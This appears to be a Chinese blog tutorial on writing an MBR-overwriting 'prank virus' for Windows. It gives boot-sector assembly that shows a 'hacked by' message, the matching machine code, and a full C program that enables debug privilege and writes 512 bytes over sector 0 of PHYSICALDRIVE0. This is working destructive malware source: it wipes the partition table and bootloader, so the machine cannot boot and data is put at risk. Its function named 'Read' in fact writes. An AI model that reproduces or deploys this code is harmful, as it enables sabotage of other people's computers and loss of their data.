mbr引导区

mbr

windows

发布日期: 2020-01-06

文章字数: 1.1k

阅读时长: 5 分

阅读次数:

功能

一个简单的病毒(不能传播的假病毒)，通过改写mbr,达到不能开机的效果😬

mbr

MBR是硬盘的主引导记录，也就是硬盘的0柱面、0磁头、1扇区称为主引导扇区。mbr占用512个字节(200h)，它用于硬盘启动时将系统控制权交给用户指定的,所以就是先于操作系统拿到控制权。

病毒原理

1.准备要写入的mbr。
2.提升程序权限,调用CreateFile函数去打开物理驱动器的时候，必须具备调试权限，否则就会打开失败，打开失败我们就不能对mbr进行读取了。
3.写入mbr,这样就有拿到优先操作系统的控制权了。

汇编源码

assume cs:code 
code segment
start:
mov ax,12h           ;使用12号功能，对显示器进行设置    
int 10h              ;显示器的设置
mov bp, 7C18H        ;字符串的起始偏移
mov cx, 13h          ;字符串长度
mov ax,1301h         ;AH = 13h 调用功能号13 ,在teletype模式下显示字符串,AL = 01H
mov bx,0Ch           ;BH = 00H BL = 0CH
mov dx,0h            ;起始的行列
int 10h
jmp $       ;无线循环，防止代码进入数据区
code ends
end start

获得机器码

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 EB FE
之后将想要显示的字符串添加到后面
68 61 63 6B 20 62 79 20 54 68 72 69 75 6D 70 68
21 14
最后两个字节必须是55AA，因为55AA是MBR的结束标志

编写mbr引导区病毒

主程序有两个函数，一个函数提权，一个函数写mbr

#include<windows.h>
#include<winioctl.h>
char temp[512]= {
0xB8,0x12,0x00,0xCD,0x10,0xBD,0x18,0x7C,0xB9,0x13,00,0xB8,0x01,0x13,0xBB,0x0C,00,0xBA,00,00,
0xCD,0x10,0xE2,0xFE,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x54,0x68,0x72,0x69,0x75,
0x6D,0x70,0x68,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x55,0xAA
};

//自己写一个函数来提权。
void GetPrivileges()
{
//定义一个PLUID
HANDLE hProcess;
HANDLE hTokenHandle;
TOKEN_PRIVILEGES tp;
//获取当前进程的句柄
hProcess = GetCurrentProcess();
OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hTokenHandle);
//函数查看系统权限的特权值，返回信息到一个LUID结构体里。
tp.PrivilegeCount =1; 
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid); 
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hTokenHandle,FALSE,&tp,sizeof(tp),NULL,NULL); 
CloseHandle(hTokenHandle);
CloseHandle(hProcess);
}
//下面的函数来读取"\\\\.\\PHYSICALDRIVE0"
void ReadPHYSICALDRIVE0()
{
HANDLE hFile;
DWORD dwReadSize;
// char lpBuffer[512];
//使用createFile打开这个文件
char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
hFile = CreateFile(str_Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL ,0);
if (hFile == INVALID_HANDLE_VALUE)
{
MessageBox(0, "wrong", "wrong", 0);
}
//用readfile来读取文件
WriteFile(hFile, temp, 512, &dwReadSize, NULL);
}
int main()
{
GetPrivileges();
ReadPHYSICALDRIVE0();
return 0;
}